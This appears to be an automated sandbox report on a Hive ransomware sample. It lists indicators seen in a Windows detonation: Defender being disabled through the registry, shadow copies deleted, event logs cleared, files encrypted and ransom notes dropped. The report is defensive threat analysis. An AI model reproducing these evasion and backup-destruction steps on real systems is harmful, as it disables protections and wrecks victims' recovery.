Malware Analysis Report

2024-10-16 03:12

Sample ID 220112-x5ql3sdgdr
Target 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.7z
SHA256 e27dcfb10467613e5ee52796f378f4983bce3f5beb8bc372cbd05da28691fd0d
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e27dcfb10467613e5ee52796f378f4983bce3f5beb8bc372cbd05da28691fd0d

Threat Level: Known bad

The file 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Deletes Windows Defender Definitions

Hive

Modifies security service

Deletes shadow copies

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 19:26

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 19:26

Reported

2022-01-12 19:31

Platform

win10-en-20211208

Max time kernel

249s

Max time network

192s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-256_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Audio\Skype_Call_Failed.m4a C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\gl_60x42.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_kv9Nv_CNrH80.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_LSN7vgJSg6g0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeWideTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sMVkP1NPZso0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul-oob.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_s2_hMgOyzJc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.dualsim2.sad.scale-200.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-96_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_u20freu1K1A0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_zKwDXLNIbTg0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsBadge.contrast-white_scale-200.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-30_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_KgwdRolNN7Q0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_v479qaNH8wY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_5k0lcdEwqAg0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.scale-200.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeMediumTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\StarClub\challenge_freecell.jpg C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-60.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_opXLKsWzlOU0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_9RyT3Iu5DpM0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8oDcoUIAlmg0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\beer.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_bUnJ5rFiI500.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Yj2jYxo9xW00.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Xg25oex9Nls0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-pl.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_gdPn1VxxTSI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sb4odawn_Tc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_SNQAZIWfGI80.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_46NHKIJyPm80.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorMedTile.contrast-white_scale-200.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_XKl21rT2vHI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_VnwmtVJie2E0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ss_60x42.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\RadialControl\Rotate_E7AD_HC_64x64.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\Logo.scale-100.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8LZ7MFiTx8o0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\GameModeTripeaks.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Flag.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\iheart-radio.scale-150.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\FlickLearningWizard.exe.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_onKnrY9HHIo0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.smile.small.scale-150.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_WZ5an1CMDXY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
